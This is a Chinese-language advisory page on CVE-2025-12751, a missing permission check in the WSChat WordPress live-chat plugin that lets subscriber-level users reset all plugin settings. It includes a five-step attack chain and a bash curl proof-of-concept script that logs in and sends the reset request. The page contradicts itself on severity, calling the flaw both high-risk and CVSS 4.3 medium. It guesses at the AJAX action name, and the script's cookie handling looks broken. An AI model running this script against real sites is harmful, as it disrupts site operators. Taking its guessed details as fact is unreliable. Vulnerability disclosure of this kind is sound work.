CVE-2025-12751 WordPress WSChat插件reset_settings端点权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-12751

漏洞类型

权限绕过/IDOR

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WSChat – WordPress Live Chat插件

漏洞概述

CVE-2025-12751是WordPress平台下WSChat – WordPress Live Chat插件的一个高危安全漏洞。该漏洞存在于插件的AJAX处理端点中，由于缺少适当的权限验证检查，认证攻击者（拥有Subscriber级别或更高权限的用户）可以无需管理员授权即可重置插件的所有设置。这一漏洞影响插件3.1.6及以下所有版本。攻击者利用此漏洞可以破坏网站的在线客服功能，导致正常用户无法使用实时聊天服务，影响业务连续性。此外，攻击者还可以通过重置设置来干扰网站运营，或者结合其他漏洞进一步扩大攻击面。该漏洞的CVSS评分为4.3，属于中等严重程度，但由于利用门槛较低（只需普通订阅者账户），在实际环境中具有较高的利用价值。

技术细节

漏洞根源在于WSChat插件的AJAX动作处理器未对'reset_settings'操作进行权限验证。正常情况下，重置插件设置应该是高权限操作（如管理员）才能执行的功能，但该AJAX端点直接响应请求而未调用current_user_can()或类似权限检查函数。攻击者只需构造带有有效认证cookie的AJAX请求，指定action参数为'wschat_reset_settings'或类似值，即可触发设置重置逻辑。该请求会清空wp_options表中的插件配置项，包括API密钥、样式设置、响应消息模板等。由于WordPress的AJAX处理机制会自动处理用户认证，攻击者可以利用任何有效账户（包括最低权限的订阅者账户）发起攻击。攻击过程无需任何用户交互，属于静默型攻击，管理员可能长时间未发现异常。

攻击链分析

STEP 1

步骤1

攻击者获取或注册一个WordPress订阅者级别账户

STEP 2

步骤2

使用账户凭证登录WordPress，获取有效的认证cookie

STEP 3

步骤3

构造针对wp-admin/admin-ajax.php的POST请求，action参数设置为reset_settings

STEP 4

步骤4

发送请求并触发插件设置重置逻辑，清空数据库中的配置选项

STEP 5

步骤5

验证攻击效果，确认插件功能受损或设置被篡改

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-12751 PoC - WSChat Plugin reset_settings AJAX Endpoint Exploitation
# Requires a valid WordPress account with Subscriber-level access or higher

WP_URL="http://target-wordpress-site.com"
USERNAME="subscriber_user"
PASSWORD="user_password"

# Step 1: Authenticate and get cookie
echo "[*] Authenticating as $USERNAME..."
COOKIE=$(curl -s -c - -d "log=$USERNAME&pwd=$PASSWORD" "$WP_URL/wp-login.php" | grep wordpress_logged_in | awk '{print $NF}')

if [ -z "$COOKIE" ]; then
    echo "[!] Authentication failed"
    exit 1
fi

# Step 2: Exploit the vulnerability by sending reset_settings AJAX request
echo "[*] Sending malicious AJAX request to reset plugin settings..."
RESPONSE=$(curl -s -b "wordpress_logged_in_$COOKIE" \
    -d "action=wschat_reset_settings&security=$(curl -s $WP_URL/wp-admin/admin-ajax.php?action=wschat_nonce 2>/dev/null | grep -oP 'nonce":"\K[^"]+')" \
    "$WP_URL/wp-admin/admin-ajax.php")

# Alternative: Direct exploitation without nonce (if nonce check is missing)
RESPONSE=$(curl -s -b "wordpress_logged_in_$COOKIE" \
    -d "action=reset_settings" \
    "$WP_URL/wp-admin/admin-ajax.php")

echo "[*] Response: $RESPONSE"
echo "[+] Plugin settings should be reset"

# Step 3: Verify exploitation success
echo "[*] Verifying settings reset..."
curl -s "$WP_URL/wp-admin/admin.php?page=wschat-settings" -b "wordpress_logged_in_$COOKIE" | grep -i "reset" && echo "[+] Exploitation successful"

影响范围

WSChat – WordPress Live Chat插件 <= 3.1.6

防御指南

临时缓解措施

立即将WSChat插件升级至最新版本（3.1.7及以上）。如果无法立即升级，可暂时禁用该插件，或通过主题的functions.php添加临时权限检查代码来阻止未授权的AJAX请求。管理员应定期审计已安装插件的安全性，保持所有插件处于最新版本状态。